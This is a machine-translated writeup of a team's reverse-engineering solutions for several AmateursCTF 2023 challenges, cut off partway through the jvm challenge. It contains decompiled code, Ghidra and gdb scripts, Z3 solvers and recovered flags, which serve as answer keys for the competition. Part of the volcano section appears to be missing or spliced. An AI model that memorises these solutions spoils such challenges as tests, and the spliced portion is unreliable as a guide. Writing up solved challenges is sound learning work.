{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-amature-2023-en","result":{"data":{"markdownRemark":{"id":"93cd7042-6fd1-5ca3-a4b8-af8da1303006","html":"
\n

This page has been machine-translated from the original page.

\n
\n

I participated in AmateursCTF 2023, which ran for five days starting on 7/15, with 0nePadding, and we finished 16th out of 914 teams.

\n

\n \n \n \n \n \n \n \n \n

\n

Thanks in part to the strong performance of new members who have started participating seriously from this event onward, we stayed just below the very top of the leaderboard the whole time, which made it a pretty intense contest.

\n

For Rev, I managed to clear all of the ELF, PE, and Java problems, but I couldn’t keep up with analyzing more unusual code such as Emojicode and Scratch, so I wasn’t able to finish those in the end.

\n

I’d really like to have one more teammate who mainly works on Rev.

\n

There were a lot of challenges, so this writeup is a bit brief, but here it is.

\n\n

Table of Contents

\n\n

rusteze(Rev)

\n
\n

Get rid of all your Rust rust with this brand new Rust-eze™ de-ruster.

\n

Flag is amateursCTF{[a-zA-Z0-9_]+}

\n
\n

This was an ELF binary analysis challenge written in Rust.

\n

When decompiled, it yielded code like the following.

\n

\n \n \n \n \n \n \n \n \n

\n

The decompiled result was as follows.

\n
void rusteze::rusteze::main(void)\n{\n  ulong uVar1;\n  Result<(),_std::io::error::Error> self;\n  u8 *puVar2;\n  ulong in_stack_fffffffffffffdc8;\n  undefined7 in_stack_fffffffffffffdd0;\n  Arguments local_1b8;\n  undefined8 local_188;\n  String local_180;\n  Result<usize,_std::io::error::Error> local_168;\n  undefined8 local_158;\n  Arguments local_150;\n  byte key [38];\n  byte result [38];\n  ulong i;\n  byte local_c7;\n  byte check [38];\n  Arguments local_a0;\n  Arguments local_70;\n  &str local_30;\n  byte local_19;\n  undefined4 local_18;\n  byte local_11;\n  &str local_10;\n  byte r;\n  \n  core::fmt::Arguments::new_const\n            (&local_1b8,\n             (&[&str])CONCAT115(r,CONCAT78(in_stack_fffffffffffffdd0,in_stack_fffffffffffffdc8)));\n  std::io::stdio::_print(&local_1b8);\n  local_188 = std::io::stdio::stdout();\n  self = (Result<(),_std::io::error::Error>)std::io::stdio::{impl#12}::flush(&local_188);\n  core::result::Result<(),_std::io::error::Error>::unwrap<(),_std::io::error::Error>(self);\n  alloc::string::String::new(&local_180);\n                    /* try { // try from 00108f21 to 00108f29 has its CatchHandler @ 00108f43 */\n                    /* } // end try from 00108f21 to 00108f29 */\n  local_158 = std::io::stdio::stdin();\n                    /* try { // try from 00108f66 to 00108fc6 has its CatchHandler @ 00108f43 */\n  std::io::stdio::Stdin::read_line(&local_168,&local_158,&local_180);\n  core::result::Result<usize,_std::io::error::Error>::unwrap<usize,_std::io::error::Error>\n            (&local_168,\n             (Result<usize,_std::io::error::Error>)\n             CONCAT115(r,CONCAT78(in_stack_fffffffffffffdd0,in_stack_fffffffffffffdc8)));\n  alloc::string::{impl#38}::deref(&local_180);\n                    /* } // end try from 00108f66 to 00108fc6 */\n  local_30 = core::str::{impl#0}::trim\n                       ((&str)CONCAT115(r,CONCAT78(in_stack_fffffffffffffdd0,\n                                                   in_stack_fffffffffffffdc8)));\n  puVar2 = SUB168((undefined  [16])local_30,0);\n  local_10 = local_30;\n  if (SUB168((undefined  [16])local_30,8) == 0x26) {\n    key[0] = 0x27;\n    key[1] = 0x97;\n    key[2] = 0x57;\n    key[3] = 0xe1;\n    key[4] = 0xa9;\n    key[5] = 0x75;\n    key[6] = 0x66;\n    key[7] = 0x3e;\n    key[8] = 0x1b;\n    key[9] = 99;\n    key[10] = 0xe3;\n    key[11] = 0xa0;\n    key[12] = 5;\n    key[13] = 0x73;\n    key[14] = 0x59;\n    key[15] = 0xfb;\n    key[16] = 10;\n    key[17] = 0x43;\n    key[18] = 0x8f;\n    key[19] = 0xe0;\n    key[20] = 0xba;\n    key[21] = 0xc0;\n    key[22] = 0x54;\n    key[23] = 0x99;\n    key[24] = 6;\n    key[25] = 0xbf;\n    key[26] = 0x9f;\n    key[27] = 0x2f;\n    key[28] = 0xc4;\n    key[29] = 0xaa;\n    key[30] = 0xa6;\n    key[31] = 0x74;\n    key[32] = 0x1e;\n    key[33] = 0xdd;\n    key[34] = 0x97;\n    key[35] = 0x22;\n    key[36] = 0xed;\n    key[37] = 0xc5;\n    memset(result,0,0x26);\n    i = 0;\n    uVar1 = i;\n    while (i = uVar1, i < 0x26) {\n      if (0x25 < i) {\n                    /* try { // try from 0010933e to 001095c0 has its CatchHandler @ 00108f43 */\n                    /* WARNING: Subroutine does not return */\n        core::panicking::panic_bounds_check(i,0x26,&DAT_5555555a6038);\n      }\n      if (0x25 < i) {\n                    /* WARNING: Subroutine does not return */\n        core::panicking::panic_bounds_check(i,0x26,&DAT_5555555a6050);\n      }\n      local_19 = puVar2[i] ^ key[i];\n      local_18 = 2;\n      local_c7 = local_19 << 2 | local_19 >> 6;\n      local_11 = local_c7;\n      if (0x25 < i) {\n                    /* WARNING: Subroutine does not return */\n        core::panicking::panic_bounds_check(i,0x26,&DAT_5555555a6068);\n      }\n      result[i] = local_c7;\n      uVar1 = i + 1;\n      if (0xfffffffffffffffe < i) {\n                    /* WARNING: Subroutine does not return */\n        core::panicking::panic(\"attempt to add with overflowCorrect!\\n\",0x1c,&DAT_5555555a6080);\n      }\n    }\n    check[0] = 0x19;\n    check[1] = 0xeb;\n    check[2] = 0xd8;\n    check[3] = 0x56;\n    check[4] = 0x33;\n    check[5] = 0;\n    check[6] = 0x50;\n    check[7] = 0x35;\n    check[8] = 0x61;\n    check[9] = 0xdc;\n    check[10] = 0x96;\n    check[11] = 0x6f;\n    check[12] = 0xb5;\n    check[13] = 0xd;\n    check[14] = 0xa4;\n    check[15] = 0x7a;\n    check[16] = 0x55;\n    check[17] = 0xe8;\n    check[18] = 0xfe;\n    check[19] = 0x56;\n    check[20] = 0x97;\n    check[21] = 0xde;\n    check[22] = 0x9d;\n    check[23] = 0xaf;\n    check[24] = 0xd4;\n    check[25] = 0x47;\n    check[26] = 0xaf;\n    check[27] = 0xc1;\n    check[28] = 0xc2;\n    check[29] = 0x6a;\n    check[30] = 0x5a;\n    check[31] = 0xac;\n    check[32] = 0xb1;\n    check[33] = 0xa2;\n    check[34] = 0x8a;\n    check[35] = 0x59;\n    check[36] = 0x52;\n    check[37] = 0xe2;\n    i = 0;\n    uVar1 = i;\n    while( true ) {\n      i = uVar1;\n      if (0x25 < i) {\n        core::fmt::Arguments::new_const\n                  (&local_70,\n                   (&[&str])CONCAT115(r,CONCAT78(in_stack_fffffffffffffdd0,in_stack_fffffffffffffdc8\n                                                )));\n                    /* } // end try from 0010933e to 001095c0 */\n        std::io::stdio::_print(&local_70);\n        core::ptr::drop_in_place<alloc::string::String>(&local_180);\n        return;\n      }\n      if (0x25 < i) {\n                    /* WARNING: Subroutine does not return */\n        core::panicking::panic_bounds_check(i,0x26,&DAT_5555555a6098);\n      }\n      r = result[i];\n      if (0x25 < i) {\n                    /* WARNING: Subroutine does not return */\n        core::panicking::panic_bounds_check(i,0x26,&DAT_5555555a60b0);\n      }\n      if (r != check[i]) break;\n      in_stack_fffffffffffffdc8 = i + 1;\n      uVar1 = in_stack_fffffffffffffdc8;\n      if (0xfffffffffffffffe < i) {\n                    /* WARNING: Subroutine does not return */\n        core::panicking::panic(\"attempt to add with overflowCorrect!\\n\",0x1c,&DAT_5555555a60c8);\n      }\n    }\n    core::fmt::Arguments::new_const\n              (&local_a0,\n               (&[&str])CONCAT115(r,CONCAT78(in_stack_fffffffffffffdd0,in_stack_fffffffffffffdc8)));\n    std::io::stdio::_print(&local_a0);\n  }\n  else {\n                    /* try { // try from 00109163 to 0010918e has its CatchHandler @ 00108f43 */\n    core::fmt::Arguments::new_const\n              (&local_150,\n               (&[&str])CONCAT115(r,CONCAT78(in_stack_fffffffffffffdd0,in_stack_fffffffffffffdc8)));\n                    /* } // end try from 00109163 to 0010918e */\n    std::io::stdio::_print(&local_150);\n  }\n  core::ptr::drop_in_place<alloc::string::String>(&local_180);\n  return;\n}
\n

You can see that it accepts an input of 0x26 characters, transforms it with a hard-coded Key, and then compares the result with a likewise hard-coded Check array.

\n

For the arrays hard-coded in the binary, I collected them all at once with the following Ghidra script.

\n
addr = toAddr(0x109011)\ninst = getInstructionAt(addr)\nresult = []\nfor i in range(0x26):\n    result.append(inst.getDefaultOperandRepresentation(1))\n    inst = inst.getNext()\n\nprint(result)\n# [u'0x27', u'0x97', u'0x57', u'0xe1', u'0xa9', u'0x75', u'0x66', u'0x3e', u'0x1b', u'0x63', u'0xe3', u'0xa0', u'0x5', u'0x73', u'0x59', u'0xfb', u'0xa', u'0x43', u'0x8f', u'0xe0', u'0xba', u'0xc0', u'0x54', u'0x99', u'0x6', u'0xbf', u'0x9f', u'0x2f', u'0xc4', u'0xaa', u'0xa6', u'0x74', u'0x1e', u'0xdd', u'0x97', u'0x22', u'0xed', u'0xc5']\n\naddr = toAddr(0x1091b4)\ninst = getInstructionAt(addr)\nresult = []\nfor i in range(0x26):\n    result.append(inst.getDefaultOperandRepresentation(1))\n    inst = inst.getNext()\n\nprint(result)\n# [u'0x19', u'0xeb', u'0xd8', u'0x56', u'0x33', u'0x0', u'0x50', u'0x35', u'0x61', u'0xdc', u'0x96', u'0x6f', u'0xb5', u'0xd', u'0xa4', u'0x7a', u'0x55', u'0xe8', u'0xfe', u'0x56', u'0x97', u'0xde', u'0x9d', u'0xaf', u'0xd4', u'0x47', u'0xaf', u'0xc1', u'0xc2', u'0x6a', u'0x5a', u'0xac', u'0xb1', u'0xa2', u'0x8a', u'0x59', u'0x52', u'0xe2']
\n

As for the transformation, it was only a matter of rotating the input bits and XORing with the Key, so I could recover the flag with the following Python script.

\n
key = [u'0x27', u'0x97', u'0x57', u'0xe1', u'0xa9', u'0x75', u'0x66', u'0x3e', u'0x1b', u'0x63', u'0xe3', u'0xa0', u'0x5', u'0x73', u'0x59', u'0xfb', u'0xa', u'0x43', u'0x8f', u'0xe0', u'0xba', u'0xc0', u'0x54', u'0x99', u'0x6', u'0xbf', u'0x9f', u'0x2f', u'0xc4', u'0xaa', u'0xa6', u'0x74', u'0x1e', u'0xdd', u'0x97', u'0x22', u'0xed', u'0xc5']\nres = [u'0x19', u'0xeb', u'0xd8', u'0x56', u'0x33', u'0x0', u'0x50', u'0x35', u'0x61', u'0xdc', u'0x96', u'0x6f', u'0xb5', u'0xd', u'0xa4', u'0x7a', u'0x55', u'0xe8', u'0xfe', u'0x56', u'0x97', u'0xde', u'0x9d', u'0xaf', u'0xd4', u'0x47', u'0xaf', u'0xc1', u'0xc2', u'0x6a', u'0x5a', u'0xac', u'0xb1', u'0xa2', u'0x8a', u'0x59', u'0x52', u'0xe2']\n\nfor i in range(0x26):\n    r = int(res[i], 16)\n    r = (r >> 2 | r << 6) & 0xff\n    k = int(key[i], 16)\n    print(chr(r^k), end=\"\")\n\n# amateursCTF{h0pe_y0u_w3r3nt_t00_ru5ty}
\n

volcano(Rev)

\n
\n

Inspired by recent “traumatic” events.

\n

nc amt.rs 31010

\n
\n

This one was a brutal fight.

\n

Decompiling the binary shows that it takes three input values and performs multiple operations on each of them.

\n

After several stages of validation on each value, the inputs bear and volcano are eventually passed into the following three functions.

\n

\n \n \n \n \n \n \n \n \n

\n

These constraints were extremely complicated to solve directly with Z3, and I struggled with them quite a bit, but in the end I realized that if bear and volcano are equal, I can ignore the actual implementations of these functions.

\n

As a result, I was able to recover the flag with the following simple constraints.

\n
from z3 import *\nfrom math import *\n\ns = Solver()\ni1 = BitVec('i1', 64)\ni2 = BitVec('i2', 64)\ni3 = Int('i3')\n\ns.add(i1 > 0)\ns.add(i2 > 0)\ns.add(i3 > 0)\n\n# bear\ns.add(i1 % 2 == 0) # & は NG\ns.add(i1 % 3 == 2)\ns.add(i1 % 5 == 1)\ns.add(i1 % 7 == 3)\ns.add(i1 % 0x6d == 0x37)\n\n# volcano\ns.add(volcano(i2) == 1)\n\n# volcano = bear\ns.add(i1 == i2)\n\n# v3\ns.add(i3 % 2 != 0)\ns.add(i3 != 1)\n\nresult = []\nif s.check() == sat:\n    for a in s.model():\n       print(a, s.model()[a])\n       result.append(s.model()[a])\nelse:\n    print(\"unsat\")
\n

By sending the computed input values to the challenge server, I was able to get the flag.

\n

\n \n \ngdb.execute('file {}/{}'.format(BINDIR, BIN))\ngdb.execute('b *{}'.format(0x40438c))\ngdb.execute('set $ZF = 6')\ngdb.execute('run < {} > {}'.format(INPUT, OUT))\nARCH = gdb.selected_frame().architecture()\n\nwith open(\"./gate.txt\", \"w\") as f:\n while True:\n pc = gdb.selected_frame().pc()\n result = ARCH.disassemble(pc, count=1)\n BREAK = int(result[0][\"asm\"][-8::], 16)\n gdb.execute('b *{}'.format(BREAK))\n gdb.execute('continue')\n result = ARCH.disassemble(BREAK, count=3)\n for instr in result:\n f.write(instr[\"asm\"] + \"\\n\")\n # print(hex(instr[\"addr\"]), instr[\"asm\"])\n gdb.execute('n 3')\n eflags = gdb.parse_and_eval(\"$eflags\")\n if not \"ZF\" in str(eflags):\n gdb.execute('set $eflags ^= (1 << $ZF)')\n gdb.execute('n')\n\n # Call\n pc = gdb.selected_frame().pc()\n gdb.execute('b *{}'.format(hex(pc+0x18)))\n gdb.execute('c')\n

However, with just this result, all you can determine is that “the XOR of the a-th and b-th characters in the correct flag matches the hard-coded byte value.”

\n

So in the end I created the following script using the extracted conditions as constraints and recovered the flag with Z3.

\n
with open(\"note.txt\", \"r\") as f:\n    data = f.readlines()\n    i = 0\n    for i in range(0,len(data), 3):\n        a = data[i].split(\"\\n\")[0]\n        b = data[i+1].split(\"\\n\")[0]\n        c = data[i+2].split(\"\\n\")[0]\n        print(\"s.add(flag[{}]^flag[{}] == {})\".format(a, b, c))\n\nfrom z3 import *\ns = Solver()\nflag = [BitVec(f\"flag[{i}]\", 8) for i in range(0x3d)]\nfor i in range(0x3d):\n    s.add(And(\n        (flag[i] >= 0x21),\n        (flag[i] <= 0x7e)\n    ))\n\n# amateursCTF\ns.add(flag[0] == ord(\"a\"))\ns.add(flag[1] == ord(\"m\"))\ns.add(flag[2] == ord(\"a\"))\ns.add(flag[3] == ord(\"t\"))\ns.add(flag[4] == ord(\"e\"))\ns.add(flag[5] == ord(\"u\"))\ns.add(flag[6] == ord(\"r\"))\ns.add(flag[7] == ord(\"s\"))\ns.add(flag[8] == ord(\"C\"))\ns.add(flag[9] == ord(\"T\"))\ns.add(flag[10] == ord(\"F\"))\ns.add(flag[0x2d]^flag[0xe] == 0x1d)\ns.add(flag[0x22]^flag[0x21] == 0x5)\ns.add(flag[0x34]^flag[0x28] == 0x5)\ns.add(flag[0x38]^flag[0xc] == 0x5)\ns.add(flag[0xb]^flag[0x4] == 0x1e)\ns.add(flag[0x37]^flag[0x13] == 0x12)\ns.add(flag[0x2b]^flag[0x3c] == 0x4e)\ns.add(flag[0x16]^flag[0x11] == 0x43)\ns.add(flag[0x3b]^flag[0x8] == 0x33)\ns.add(flag[0x34]^flag[0x2e] == 0x5)\ns.add(flag[0x2b]^flag[0x1f] == 0x5b)\ns.add(flag[0x1d]^flag[0xe] == 0xf)\ns.add(flag[0x2d]^flag[0x25] == 0x1d)\ns.add(flag[0x36]^flag[0x1] == 0x32)\ns.add(flag[0x1d]^flag[0x36] == 0x38)\ns.add(flag[0x17]^flag[0xa] == 0x2a)\ns.add(flag[0x11]^flag[0x8] == 0x70)\ns.add(flag[0x21]^flag[0x1e] == 0x3e)\ns.add(flag[0x3a]^flag[0x1d] == 0x54)\ns.add(flag[0x6]^flag[0x38] == 0x1e)\ns.add(flag[0x5]^flag[0x4] == 0x10)\ns.add(flag[0xf]^flag[0x10] == 0x42)\ns.add(flag[0x4]^flag[0x1e] == 0x3a)\ns.add(flag[0x1d]^flag[0x21] == 0x6)\ns.add(flag[0x1c]^flag[0x25] == 0x6)\ns.add(flag[0x28]^flag[0x1d] == 0x56)\ns.add(flag[0xb]^flag[0x5] == 0xe)\ns.add(flag[0x2a]^flag[0x12] == 0x2d)\ns.add(flag[0x2b]^flag[0x12] == 0x6c)\ns.add(flag[0x30]^flag[0x23] == 0x4)\ns.add(flag[0x31]^flag[0x25] == 0x37)\ns.add(flag[0x22]^flag[0x24] == 0x7)\ns.add(flag[0x9]^flag[0x2a] == 0x26)\ns.add(flag[0x34]^flag[0x2f] == 0x46)\ns.add(flag[0x22]^flag[0x1d] == 0x3)\ns.add(flag[0x5]^flag[0x28] == 0x44)\ns.add(flag[0x3b]^flag[0x27] == 0x2f)\ns.add(flag[0x26]^flag[0x35] == 0x17)\ns.add(flag[0x1e]^flag[0x1f] == 0x37)\ns.add(flag[0x7]^flag[0x9] == 0x27)\ns.add(flag[0x35]^flag[0x16] == 0x2)\ns.add(flag[0x3b]^flag[0x37] == 0x3)\ns.add(flag[0xa]^flag[0x30] == 0x23)\ns.add(flag[0xa]^flag[0x18] == 0x2f)\ns.add(flag[0x38]^flag[0x2c] == 0x1d)\ns.add(flag[0x27]^flag[0x12] == 0x0)\ns.add(flag[0x14]^flag[0xf] == 0x6b)\ns.add(flag[0x27]^flag[0x29] == 0x0)\ns.add(flag[0x24]^flag[0x35] == 0x11)\ns.add(flag[0x1a]^flag[0x1] == 0x5a)\ns.add(flag[0x27]^flag[0xe] == 0x37)\ns.add(flag[0x30]^flag[0x9] == 0x31)\ns.add(flag[0x2b]^flag[0x35] == 0x41)\ns.add(flag[0x6]^flag[0xc] == 0x1b)\ns.add(flag[0x21]^flag[0x3] == 0x15)\ns.add(flag[0x8]^flag[0x18] == 0x2a)\ns.add(flag[0x34]^flag[0x2] == 0x55)\ns.add(flag[0xf]^flag[0x1b] == 0x5d)\ns.add(flag[0x7]^flag[0x3b] == 0x3)\ns.add(flag[0x26]^flag[0x17] == 0x9)\ns.add(flag[0x1d]^flag[0x8] == 0x24)\ns.add(flag[0xc]^flag[0x5] == 0x1c)\ns.add(flag[0x37]^flag[0x1d] == 0x14)\ns.add(flag[0x25]^flag[0x2] == 0x9)\ns.add(flag[0x37]^flag[0x29] == 0x2c)\ns.add(flag[0x13]^flag[0x21] == 0x0)\ns.add(flag[0x33]^flag[0x3] == 0x44)\ns.add(flag[0x39]^flag[0x32] == 0x5e)\ns.add(flag[0x27]^flag[0x21] == 0x3e)\ns.add(flag[0x4]^flag[0x19] == 0x52)\ns.add(flag[0xe]^flag[0x7] == 0x1b)\ns.add(flag[0x24]^flag[0x3] == 0x17)\ns.add(flag[0x30]^flag[0x11] == 0x56)\ns.add(flag[0x18]^flag[0x2a] == 0x1b)\ns.add(flag[0x38]^flag[0x18] == 0x5)\ns.add(flag[0x18]^flag[0x34] == 0x5d)\ns.add(flag[0x3]^flag[0x28] == 0x45)\ns.add(flag[0x1a]^flag[0x9] == 0x63)\ns.add(flag[0xd]^flag[0x22] == 0x3b)\ns.add(flag[0x1e]^flag[0x23] == 0x3e)\ns.add(flag[0x1e]^flag[0x35] == 0x2d)\ns.add(flag[0x6]^flag[0x2] == 0x13)\ns.add(flag[0x2a]^flag[0x18] == 0x1b)\ns.add(flag[0x32]^flag[0x1d] == 0xa)\ns.add(flag[0x1d]^flag[0x29] == 0x38)\ns.add(flag[0x24]^flag[0x1] == 0xe)\ns.add(flag[0x1]^flag[0x21] == 0xc)\ns.add(flag[0xc]^flag[0x2e] == 0x58)\ns.add(flag[0x36]^flag[0x19] == 0x68)\ns.add(flag[0x35]^flag[0x16] == 0x2)\ns.add(flag[0x30]^flag[0x24] == 0x6)\ns.add(flag[0x11]^flag[0x2d] == 0x46)\ns.add(flag[0x1]^flag[0x5] == 0x18)\ns.add(flag[0xc]^flag[0x18] == 0x0)\ns.add(flag[0x34]^flag[0x10] == 0x42)\ns.add(flag[0x3a]^flag[0xb] == 0x48)\ns.add(flag[0x21]^flag[0x12] == 0x3e)\ns.add(flag[0x34]^flag[0x16] == 0x44)\ns.add(flag[0x2a]^flag[0x1a] == 0x45)\ns.add(flag[0x1e]^flag[0x13] == 0x3e)\ns.add(flag[0xc]^flag[0x2d] == 0x1c)\ns.add(flag[0x19]^flag[0x39] == 0x4)\ns.add(flag[0x20]^flag[0x8] == 0x26)\ns.add(flag[0xb]^flag[0x26] == 0x1e)\ns.add(flag[0x23]^flag[0x29] == 0x3e)\ns.add(flag[0x38]^flag[0xf] == 0x58)\ns.add(flag[0x39]^flag[0x17] == 0x5f)\ns.add(flag[0x22]^flag[0x2b] == 0x57)\ns.add(flag[0x39]^flag[0x15] == 0x40)\ns.add(flag[0x1]^flag[0x10] == 0x1b)\ns.add(flag[0x11]^flag[0x6] == 0x41)\ns.add(flag[0x2]^flag[0x1f] == 0x9)\ns.add(flag[0x2c]^flag[0x13] == 0x10)\ns.add(flag[0x2c]^flag[0x2b] == 0x42)\ns.add(flag[0x37]^flag[0x34] == 0x47)\ns.add(flag[0xa]^flag[0x23] == 0x27)\ns.add(flag[0x22]^flag[0x1] == 0x9)\ns.add(flag[0x24]^flag[0x21] == 0x2)\ns.add(flag[0x32]^flag[0x21] == 0xc)\ns.add(flag[0x25]^flag[0x1f] == 0x0)\ns.add(flag[0x36]^flag[0x1b] == 0x36)\ns.add(flag[0x33]^flag[0x3a] == 0x3)\ns.add(flag[0x2c]^flag[0x19] == 0x46)\ns.add(flag[0xd]^flag[0xb] == 0x24)\ns.add(flag[0x1b]^flag[0x4] == 0xc)\ns.add(flag[0x9]^flag[0x24] == 0x37)\ns.add(flag[0x23]^flag[0x1] == 0xc)\ns.add(flag[0x15]^flag[0x39] == 0x40)\ns.add(flag[0x1a]^flag[0x17] == 0x5b)\ns.add(flag[0x1f]^flag[0x35] == 0x1a)\ns.add(flag[0x2a]^flag[0x1b] == 0x1b)\ns.add(flag[0x2c]^flag[0x14] == 0x2e)\ns.add(flag[0x21]^flag[0x33] == 0x51)\ns.add(flag[0x11]^flag[0x37] == 0x40)\ns.add(flag[0x16]^flag[0x23] == 0x11)\ns.add(flag[0xc]^flag[0x19] == 0x5e)\ns.add(flag[0x9]^flag[0x2] == 0x35)\ns.add(flag[0xd]^flag[0x32] == 0x32)\ns.add(flag[0x3a]^flag[0x1b] == 0x5a)\ns.add(flag[0x3]^flag[0x2d] == 0x1)\ns.add(flag[0x25]^flag[0x1e] == 0x37)\ns.add(flag[0x35]^flag[0x38] == 0x1e)\ns.add(flag[0x8]^flag[0xc] == 0x2a)\ns.add(flag[0x14]^flag[0x16] == 0x2f)\ns.add(flag[0x4]^flag[0x1e] == 0x3a)\ns.add(flag[0x18]^flag[0x2f] == 0x1b)\ns.add(flag[0x22]^flag[0x1b] == 0xd)\ns.add(flag[0x1c]^flag[0x1b] == 0x7)\ns.add(flag[0x30]^flag[0x38] == 0x9)\ns.add(flag[0x14]^flag[0x10] == 0x29)\ns.add(flag[0x34]^flag[0x8] == 0x77)\ns.add(flag[0x32]^flag[0xf] == 0x59)\ns.add(flag[0x18]^flag[0x17] == 0x5)\ns.add(flag[0x2d]^flag[0xb] == 0xe)\ns.add(flag[0x3a]^flag[0x2] == 0x52)\ns.add(flag[0xe]^flag[0x3a] == 0x5b)\ns.add(flag[0x36]^flag[0x9] == 0xb)\ns.add(flag[0x2f]^flag[0x8] == 0x31)\ns.add(flag[0x3]^flag[0x29] == 0x2b)\ns.add(flag[0x3]^flag[0x3c] == 0x9)\ns.add(flag[0x18]^flag[0x2b] == 0x5a)\ns.add(flag[0x8]^flag[0x12] == 0x1c)\ns.add(flag[0x1e]^flag[0x8] == 0x1c)\ns.add(flag[0x16]^flag[0x19] == 0x47)\ns.add(flag[0x34]^flag[0x5] == 0x41)\ns.add(flag[0x14]^flag[0x1] == 0x32)\ns.add(flag[0xe]^flag[0x33] == 0x58)\ns.add(flag[0x12]^flag[0x2d] == 0x2a)\ns.add(flag[0x7]^flag[0x1d] == 0x14)\ns.add(flag[0x17]^flag[0x2a] == 0x1e)\ns.add(flag[0x1c]^flag[0x1d] == 0x9)\ns.add(flag[0x31]^flag[0x24] == 0x3c)\ns.add(flag[0xa]^flag[0x27] == 0x19)\ns.add(flag[0x39]^flag[0xa] == 0x75)\ns.add(flag[0xd]^flag[0x37] == 0x2c)\ns.add(flag[0x39]^flag[0x19] == 0x4)\ns.add(flag[0x29]^flag[0x19] == 0x68)\ns.add(flag[0x3b]^flag[0x14] == 0x2f)\ns.add(flag[0x17]^flag[0xe] == 0x4)\ns.add(flag[0x1a]^flag[0x1b] == 0x5e)\ns.add(flag[0x3a]^flag[0x5] == 0x46)\ns.add(flag[0x10]^flag[0x25] == 0x1e)\ns.add(flag[0x39]^flag[0xe] == 0x5b)\ns.add(flag[0x19]^flag[0x11] == 0x4)\ns.add(flag[0x6]^flag[0x28] == 0x43)\ns.add(flag[0x28]^flag[0xd] == 0x6e)\ns.add(flag[0x36]^flag[0x1e] == 0x0)\ns.add(flag[0x19]^flag[0xd] == 0x68)\ns.add(flag[0x2]^flag[0x12] == 0x3e)\ns.add(flag[0xd]^flag[0xa] == 0x19)\ns.add(flag[0x27]^flag[0x21] == 0x3e)\ns.add(flag[0x12]^flag[0x22] == 0x3b)\ns.add(flag[0x6]^flag[0x23] == 0x13)\ns.add(flag[0x31]^flag[0x26] == 0x3a)\ns.add(flag[0x4]^flag[0x2] == 0x4)\ns.add(flag[0x30]^flag[0x34] == 0x51)\ns.add(flag[0x3a]^flag[0xe] == 0x5b)\ns.add(flag[0x2d]^flag[0x6] == 0x7)\ns.add(flag[0x13]^flag[0x8] == 0x22)\ns.add(flag[0x4]^flag[0x36] == 0x3a)\ns.add(flag[0x22]^flag[0x3] == 0x10)\ns.add(flag[0xc]^flag[0xb] == 0x12)\ns.add(flag[0x25]^flag[0x3c] == 0x15)\ns.add(flag[0x39]^flag[0x2b] == 0x0)\ns.add(flag[0xd]^flag[0x7] == 0x2c)\ns.add(flag[0x18]^flag[0x7] == 0x1a)\ns.add(flag[0x37]^flag[0x35] == 0x1)\ns.add(flag[0x19]^flag[0x6] == 0x45)\n\nwhile s.check() == sat:\n    m = s.model()\n    for c in flag:\n        print(chr(m[c].as_long()),end=\"\")\n    print(\"\")\n    break
\n

CSCE221-Data Structures and Algorithms(Rev)

\n
\n

I was doing some homework for my Data Structures and Algorithms class, but my program unexpectedly crashed when I entered in my flag. Could you help me get it back?

\n

Here’s the coredump and the binary, I’ll even toss in the header file. Can’t give out the source code though, how do I know you won’t cheat off me?

\n
\n

This challenge gives you an ELF binary and a core dump of that binary.

\n

I was briefly stuck because the core dump could not be loaded into gdb due to a format mismatch error, but I found that Ghidra could analyze it, so I continued from there.

\n

First, I analyzed the normal ELF file itself.

\n

It turned out that this binary uses custom structures called list and listnode to split the input string and store it in memory.

\n
typedef unsigned char byte;\nstruct listnode {\n    byte data;\n    struct listnode *ptr;\n};\n\nstruct list {\n    int len;\n    struct listnode *head;\n}(list);\n\nvoid list_init(struct list *list, byte *data, int len);\nvoid list_mix(struct list *list);
\n

So first, I identified the address of the main function from the core dump.

\n

\n \n \n \n \n \n \n \n \n

\n

Next, I created structure definitions for list and listnode in Ghidra.

\n

\n \n \n \n \n \n \n \n \n

\n

Once I registered the structures I defined here in the data section of the core dump, I could see that the pointer addresses to the listnode structures held by the list structure had been filled in.

\n

\n \n \n \n \n \n \n \n \n

\n

I thought I could get the flag just by following those pointers, but unfortunately the linked list of listnode structures had been corrupted partway through.

\n

\n \n \n \n \n \n \n \n \n

\n

However, even though the list pointers were corrupted, the actual memory data itself seemed to still be intact, so I wrote the following Ghidra script to assign listnode structures over the memory region and recover the values.

\n
from ghidra.app.script import GhidraScript\n\n# listnode の取得\ndata_type_manager = currentProgram.getDataTypeManager()\nmy_structure = data_type_manager.getDataType(\"main.coredump/listnode\")\nstart_address = toAddr(\"0x405000\")\ndata_section = currentProgram.getMemory().getBlock(start_address)\n\nflag = \"\"\nlistnode_addr = 0x4052a0\nfor i in range(0x1d):   \n    data_address = toAddr(hex(listnode_addr))\n    data_object = createData(data_address, my_structure)\n    data_structure = data_object.dataType\n    data_component = data_structure.getComponent(0x0)\n    offset = data_component.offset\n    length = data_component.length\n    data_type = data_component.dataType\n    byte_array = getBytes(data_address.add(offset), length)\n    flag += chr(byte_array[0])\n    listnode_addr += 32
\n

Running this script let me recover the flag in Ghidra.

\n

\n \n \n \n \n \n \n \n \n

\n

jvm(Rev)

\n
\n

I heard my professor talking about some “Java Virtual Machine” and its weird gimmicks, so I took it upon myself to complete one. It wasn’t even that hard? I don’t know why he was complaining about it so much.

\n
\n

This was a Java-based VM challenge.

\n

It was my revenge match after the recent UIUCTF VM problem, and this time I somehow managed to solve it.

\n

I decompiled the provided class file with jadx and added print debugging to several parts of the processing.

\n
import java.io.BufferedReader;\nimport java.io.File;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\n\npublic class Solver {\n    static byte[] program;\n\n    public static void main(String[] strArr) throws IOException {\n        File file = new File(strArr[0]);\n        FileInputStream fileInputStream = new FileInputStream(file);\n        program = new byte[(int) file.length()];\n        fileInputStream.read(program);\n        fileInputStream.close();\n        vm();\n    }\n\n    private static void vm() throws IOException {\n        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(System.in));\n        int pc = 0;\n        int sp = 0;\n        int[] stack = new int[1024];\n        int[] buf = new int[4];\n        while (pc < program.length) {\n            // System.out.println(stack);\n            // System.out.println(buf);\n            System.out.print(\"Offset: \");\n            System.out.print(Integer.toHexString(pc));\n            System.out.print(\"  Call: \");\n            System.out.println(program[pc]);\n            // System.out.println(stack[0]);\n            switch (program[pc]) {\n                case 0:\n                case 1:\n                case 2:\n                case 3:\n                    // System.out.println(program[pc]);\n                    byte b = program[pc];\n                    byte b2 = program[pc + 1];\n                    int i3 = buf[b];\n                    buf[b] = buf[b2];\n                    buf[b2] = i3;\n                    System.out.print(\"======> 0x0 0x1 0x2 0x3 : \");\n                    System.out.print(\"Swap 